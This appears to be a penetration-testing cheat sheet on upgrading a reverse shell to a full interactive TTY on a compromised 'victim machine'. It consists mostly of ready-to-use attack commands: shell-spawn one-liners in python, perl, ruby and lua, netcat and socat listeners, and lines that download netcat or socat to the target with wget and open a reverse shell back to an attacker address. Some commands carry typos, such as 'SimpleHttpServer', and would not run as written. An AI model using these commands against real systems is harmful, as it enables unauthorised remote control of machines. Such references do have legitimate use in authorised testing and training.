# Shell Balancing

### Example of Bad shell

![](https://3989642013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fz4O59jPTfyNTpTEwEhZa%2Fuploads%2FDVmjqRWVcrPH3Lq7OaYl%2Fimage.png?alt=media\&token=3ad3a89b-650a-4f6c-9a5b-89c7678fdf26)

## Upgrade reverse shell to fully usable TTY shell

### rlwrap

* During reciving connection form target machine we can use  `rlwrap`
* we can also mitigate some of the restrictions of poor netcat shells by wrapping the netcat listener with the `rlwrap` command.
* This is not installed by default so we need to install it using `sudo apt rlwrap`.

```bash
rlwrap nc -lvnp $port 		
```

### Using env-call and script

* This is a generic shell command that receive  the default system shell.&#x20;

```bash
SHELL=/bin/bash script -q /dev/null		
```

### Using Script

* script comes pre-installed
* check the man page&#x20;
* -q is for quite , -c is for command &#x20;

```bash
/usr/bin/script -qc /bin/bash /dev/null    
```

**`ctrl+z`**

```bash
stty raw -echo; fg; reset
```

### Python&#x20;

* Python is great tool for balancing the shell.&#x20;

```bash
 # on victum machine
python -c 'import pty;pty.spawn("/bin/bash")' 
python3 -c 'import pty;pty.spawn("/bin/bash")'

```

`ctrl+z`

```bash
# on attacker machine
stty raw -echo    
fg                
```

```bash
# on victum machine
reset    
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>
```

### Perl

* If python is not installed or perl avilable on box then we can use this .

```bash
perl -e 'exec "/bin/sh";'	# 	
```

### Ruby

* if ruby is installed on box.

```bash
exec "/bin/sh"        

ruby -e 'exec "/bin/sh"'		
```

### Lua

```bash
lua -e "os.execute('/bin/sh')"	
```

### Copy over NC and spawn a shell

* Using wget and python's SimpleHttpServer NC was easily moved over to the target
* here we copy nc to victum machine and then rece**i**ve the shell.

```bash
# Attacker Machine

cp /usr/bin/nc . ; python -m SimpleHttpServer 9998               
nc -nlvp 9998
```

```bash
# Victum Machine

cd /tmp; wget http://10.x.x.x:9998/nc; chmod +x nc
./nc 10.x.x.x 9998 -e /bin/bash
```

### Socat

* never sue nc while receiving connections ,use socat it will give you more generic shell like ssh.

```bash
# Attacker Machine

socat file:`tty`,raw,echo=0 TCP-L:1234
```

```bash
# Victum Machine

    
/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:1234    

# if socat not preasent then we can use the binary 

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:1234      

```

* Resource - <https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat>